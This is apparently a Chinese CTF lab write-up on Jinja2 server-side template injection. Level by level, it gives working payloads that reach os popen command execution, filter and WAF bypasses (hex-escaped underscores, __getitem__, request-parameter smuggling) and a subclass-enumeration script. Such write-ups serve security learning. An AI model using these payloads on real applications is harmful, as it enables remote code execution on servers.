SSTI-lab

Level-1 no waf

{{2*2}}

测试发现存在ssti漏洞
SSTI-lab_第1张图片

{{''.__class__}}

SSTI-lab_第2张图片

{{''.__class__.__bases__[0]}}

SSTI-lab_第3张图片

{{''.__class__.__bases__[0].__subclasses__}}

SSTI-lab_第4张图片

import requests

url="http://node1.anna.nssctf.cn:28430/level/1"

#payload={{''.__class__.__bases__[0].__subclasses__()[1]}}
#payload="{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__("+str(i)+"}}"
for i in range(500):
    payload = {"code":"{{''.__class__.__bases__[0].__subclasses__()["+str(i)+"]}}"}
    #print(payload)
    res=requests.post(url=url,data=payload)
    #print(res.text)
    if "os" in res.text:
        print(res.text)
        print(payload)

经过测试发现"os._wrap_close"在第133个子类,这时候可以调用133子类

{{''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read()}}

SSTI-lab_第5张图片

Level-2 bl[‘{{’]

{{2*2}}

发现被过滤了{{

{%print(2*2)%}

SSTI-lab_第6张图片

{%print(''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read())%}

SSTI-lab_第7张图片

Level-4 bl[‘[’, ‘]’]

{{''.__class__.__bases__[0]}}

发现存在WAF
SSTI-lab_第8张图片

{{''.__class__.__bases__.__getitem__(0).__subclasses__()}}
{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(133)}}

找到危险函数
SSTI-lab_第9张图片

{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(133).__init__.__globals__.__getitem__('popen')('ls').read()}}

SSTI-lab_第10张图片

Level-5 bl[‘’', ‘"’]

{{().__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.cookies.arg1](request.cookies.arg2).read()}}

SSTI-lab_第11张图片

{{().__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.values.arg1](request.values.arg2).read()}}

SSTI-lab_第12张图片

Level-6 bl[‘_’]

{{''["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()[133]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]['popen']('ls').read()}}

利用\x5f替代下划线,并且加上[]
SSTI-lab_第13张图片

Level-7 bl[‘.’]

过滤了点,这是可以利用[]绕过

{{''['__class__']['__bases__'][0]['__subclasses__']()[133]['__init__']['__globals__']['popen']('ls')['read']()}}

SSTI-lab_第14张图片

你可能感兴趣的:(python,django)